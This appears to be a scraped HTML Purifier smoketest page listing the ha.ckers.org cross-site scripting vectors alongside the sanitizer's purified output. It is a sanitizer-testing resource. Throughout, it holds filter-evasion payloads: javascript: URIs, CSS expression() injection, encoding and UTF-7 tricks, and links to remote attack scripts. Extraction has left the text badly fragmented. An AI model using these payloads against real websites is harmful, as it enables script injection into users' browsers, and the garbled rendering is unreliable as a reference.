HTML Purifier XSS Attacks Smoketest
XSS attacks are from
http://ha.ckers.org/xss.html .
Caveats:
Google.com has been programatically disallowed, but as you can
see, there are ways of getting around that, so coverage in this area
is not complete. Most XSS broadcasts its presence by spawning an alert dialogue.
The displayed code is not strictly correct, as linebreaks have been forced for
readability. Linewraps have been marked with
» . Some tests are
omitted for your convenience. Not all control characters are displayed.
Test
Name Raw Output Render
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//-->
»
CRIPT>">'>»
>
SCRIPT w/Source File
SCRIPT w/Char Code
BASE
»
HREF="javascript:alert('XSS'
»
);//">
BGSOUND
»
SRC="javascript:alert('XSS')
»
;">
BODY background-image
»
BACKGROUND="javascript:alert
»
('XSS');">
BODY ONLOAD
DIV background-image 1
»
STYLE="background-image:
»
url(javascript:alert('XSS'))
»
">
DIV background-image 2
»
STYLE="background-image:
»
url(javascript:alert('XS
»
S'))">
DIV expression
»
expression(alert('XSS'));">
FRAME
»
SRC="javascript:alert('XSS')
»
;">
IFRAME
INPUT Image
»
SRC="javascript:alert('XSS')
»
;">
IMG w/JavaScript Directive
»
SRC="javascript:alert('XSS')
»
;">
IMG No Quotes/Semicolon
»
SRC=javascript:alert('XSS')>
IMG Dynsrc
»
DYNSRC="javascript:alert('XS
»
S');">
IMG Lowsrc
»
LOWSRC="javascript:alert('XS
»
S');">
IMG Embedded commands 1
»
SRC="http://www.thesiteyouar
»
eon.com/somecommand.php?some
»
variables=maliciouscode">
»
src="http://www.thesiteyouar
»
eon.com/somecommand.php?some
»
variables=maliciouscode"
»
alt="somecommand.php?somevar
»
iables=maliciousc" />
IMG STYLE w/expression
exp/*»
STYLE='no\xss:noxss("*//*");
»
xss:ex/*XSS*//*/*
»
/pression(alert("XSS"))'>
exp/*
exp/*
List-style-image
IMG w/VBscript
»
SRC='vbscript:msgbox("XSS")'
»
>
LAYER
»
SRC="http://ha.ckers.org/scr
»
iptlet.html">
Livescript
»
SRC="livescript:[code]">
US-ASCII encoding
scriptalert(XSS)/script »
scriptalert(XSS)/script
scriptalert(XSS)/script
META
»
CONTENT="0;url=javascript:al
»
ert('XSS');">
META w/data:URL
»
CONTENT="0;url=data:text/htm
»
l;base64,PHNjcmlwdD5hbGVydCg
»
nWFNTJyk8L3NjcmlwdD4K">
META w/additional URL parameter
»
CONTENT="0;
»
URL=http://;URL=javascript:a
»
lert('XSS');">
Mocha
OBJECT
»
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html">
OBJECT w/Embedded XSS
»
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389>»
m name=url »
value=javascript:alert('XSS' »
)>
Embed Flash
»
SRC="http://ha.ckers.org/xss
»
.swf"
»
AllowScriptAccess="always"><
»
/EMBED>
STYLE
STYLE w/Comment
»
STYLE="xss:expr/*XSS*/ession
»
(alert('XSS'))">
STYLE w/Anonymous HTML
»
STYLE="xss:expression(alert(
»
'XSS'))">
STYLE w/background-image
»
CLASS=XSS>
STYLE w/background
Stylesheet
»
HREF="javascript:alert('XSS'
»
);">
Remote Stylesheet 1
»
HREF="http://ha.ckers.org/xs
»
s.css">
Remote Stylesheet 2
Remote Stylesheet 3
»
Content="
»
g/xss.css>; REL=stylesheet">
Remote Stylesheet 4
TABLE
BACKGROUND="javascript:alert
»
('XSS')">
TD
BACKGROUND="javascript:alert
»
('XSS')">
XML namespace
»
namespace="xss"
»
implementation="http://ha.ck
»
ers.org/xss.htc">
X »
SS
<?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
XSS
XSS
XML data island w/CDATA
»
ID=I>
<![CDATA[ »
SRC="javas]]><![CDATA[cript:
»
alert('XSS');">]]>
»
»
DATAFLD=C DATAFORMATAS=HTML>
<IMG »
SRC="javascript:alert('XSS') »
;">
XML data island w/comment
»
SRC="javascript:alert('XSS')"><
»
/I>
»
DATASRC="#xss" DATAFLD="B"
»
DATAFORMATAS="HTML">
»
alt="javas<!--
»
-->cript:alert('XSS')"
»
/>
XML (locally hosted)
»
SRC="http://ha.ckers.org/xss
»
test.xml" ID=I>
»
DATASRC=#I DATAFLD=C
»
DATAFORMATAS=HTML>
XML HTML+TIME
»
prefix="t"
»
ns="urn:schemas-microsoft-co
»
m:time">
»
namespace="t"
»
implementation="#default#tim
»
e2">
»
attributeName="innerHTML"
»
to="XSS"
»
>
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">
<?import »
namespace="t" »
implementation="#default#tim »
e2">
Commented-out Block
Cookie Manipulation
»
HTTP-EQUIV="Set-Cookie"
»
Content="USERID=">
Local .htc file
»
url(http://ha.ckers.org/xss.
»
htc);">
Rename .js to .jpg
SSI
PHP
»
echo('
aler »
t("XSS") '); ?>
<? echo('alert("XSS")'); »
?>
JavaScript Includes
Character Encoding Example
<
%3C
<
<
<
<
< »
<
<
<
� »
060
<
<
<
& »
#0060;
<
<
&# »
0000060;
<
<
 »
c
<
<
� »
03c
<
<
< »
<
<
� »
003c;
<
<
<
& »
#X0003c
<
< »
<
<
<
&#X »
0003c;
<
< »
;
<
<
<
� »
003C
<
<
&# »
x3C;
<
<
� »
3C;
<
<
& »
#X3C
<
<
< »
<
<
< »
;
<
<
< »
<
<
\x3c »
\x3C
\u003c
\u003C
<
%3C
<
<
&L »
T
<
<
<
<
& »
lt;
<
<
<
<
< »
<
<
<
<
<
&l »
t;
<
<
<
<
<
»
<
<
<
<
<
&l »
t;
<
<
<
<
<
»
<
<
<
<
<
< »
;
<
<
<
<
<
»
<
<
<
<
<
< »
;
<
<
<
<
<
& »
lt;
<
<
<
<
< »
;
<
\x3c
\x3C
\u003c
\u00 »
3C
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
Case Insensitive
»
SRC=JaVaScRiPt:alert('XSS')>
HTML Entities
»
SRC=javascript:alert("X
»
SS")>
Grave Accents
»
SRC=`javascript:alert("RSnak
»
e says, 'XSS'")`>
»
src="%60javascript%3Aalert("
»
alt="`javascript:alert("
»
;RSnake" />
Image w/CharCode
»
SRC=javascript:alert(String.
»
fromCharCode(88,83,83))>
UTF-8 Unicode Encoding
»
SRC=java&#
»
115;crip&
»
#116;:ale&
»
#114;t('X&#
»
83;S')>
Long UTF-8 Unicode w/out Semicolons
»
SRC=ja�
»
118as�
»
99ri
»
2t:a
»
ler&
»
#0000116('&#
»
0000088SS�
»
000039)>
DIV w/Unicode
»
STYLE="background-image:\007
»
5\0072\006C\0028'\006a\0061\
»
0076\0061\0073\0063\0072\006
»
9\0070\0074\003a\0061\006c\0
»
065\0072\0074\0028.1027\0058
»
.1053\0053\0027\0029'\0029">
Hex Encoding w/out Semicolons
»
SRC=java
»
3cript&#
»
x3Aalert
»
('XSS&#x
»
27)>
UTF-7 Encoding
»
HTTP-EQUIV="CONTENT-TYPE"
»
CONTENT="text/html;
»
charset=UTF-7">
»
+ADw-SCRIPT+AD4-alert
»
('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes
\";alert('XSS');//
\";alert('XSS');//
\";alert('XSS');//
End title tag
STYLE w/broken up JavaScript
Embedded Tab
»
SRC="jav
\t ascript:alert('XSS'
»
);">
»
src="jav%20ascript%3Aalert('
»
XSS');" alt="jav
»
ascript:alert('XSS');" />
Embedded Encoded Tab
»
SRC="jav ascript:alert(
»
'XSS');">
»
src="jav%20ascript%3Aalert('
»
XSS');" alt="jav
»
ascript:alert('XSS');" />
Embedded Newline
»
SRC="jav
ascript:alert(
»
'XSS');">
»
src="jav%20ascript%3Aalert('
»
XSS');" alt="jav
»
ascript:alert('XSS');" />
Embedded Carriage Return
»
SRC="jav
ascript:alert(
»
'XSS');">
»
src="jav%20ascript%3Aalert('
»
XSS');" alt="jav
»
ascript:alert('XSS');" />
Multiline w/Carriage Returns
»
p
t
:
a
l
e
r
t
(
'
X
S
S
'
»
)
"
>
»
src="j%20a%20v%20a%20s%20c%2
»
0r%20i%20p%20t%20%3A%20a%20l
»
%20e%20r%20t%20(%20'%20X%20S
»
%20S%20'%20)" alt="j a v a s
»
c r i p t : a l e r t ( ' X
»
S" />
Null Chars 1
»
SRC=java
\0 script:alert("XSS")
»
>
Null Chars 2
&\0
IPT>alert("XSS")\0
»
IPT>
&
&
Spaces/Meta Chars
»
javascript:alert('XSS');">
Non-Alpha/Non-Digit
Non-Alpha/Non-Digit Part 2
»
onload!#$%&()*~+-_.,:;?@[/|\
»
]^`=alert("XSS")>
No Closing Script Tag
Evade Regex Filter 1
Evade Regex Filter 2
Evade Regex Filter 3
Evade Regex Filter 4
Evade Regex Filter 5
Filter Evasion 1
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2
IP Encoding
»
HREF="http://66.102.7.147/">
»
XSS
»
href="http://66.102.7.147/">
»
XSS
URL Encoding
»
HREF="http://%77%77%77%2E%67
»
%6F%6F%67%6C%65%2E%63%6F%6D"
»
>XSS
XSS
Dword Encoding
»
HREF="http://1113982867/">XS
»
S
XSS
Hex Encoding
»
HREF="http://0x42.0x0000066.
»
0x7.0x93/">XSS
XSS
Octal Encoding
»
HREF="http://0102.0146.0007.
»
00000223/">XSS
XSS
Mixed Encoding
»
HREF="h
tt
\t p://6 6.00014
»
6.0x7.147/">XSS
»
href="h%20tt%20p%3A//6%206.0
»
00146.0x7.147/">XSS
Protocol Resolution Bypass
»
HREF="//www.google.com/">XSS
»
XSS
Firefox Lookups 1
XSS
XSS
Firefox Lookups 2
»
HREF="http://ha.ckers.org@go
»
ogle">XSS
»
href="http://google">XSS
Firefox Lookups 3
»
HREF="http://google:ha.ckers
»
.org">XSS
»
href="http://google">XSS
Removing Cnames
»
HREF="http://google.com/">XS
»
S
XSS
Extra dot for Absolute DNS
»
HREF="http://www.google.com.
»
/">XSS
XSS
JavaScript Link Location
»
HREF="javascript:document.lo
»
cation='http://www.google.co
»
m/'">XSS
XSS
Content Replace
»
HREF="http://www.gohttp://ww
»
w.google.com/ogle.com/">XSS<
»
/A>
»
href="http://www.gohttp//www
»
.google.com/ogle.com/">XSS</
»
a>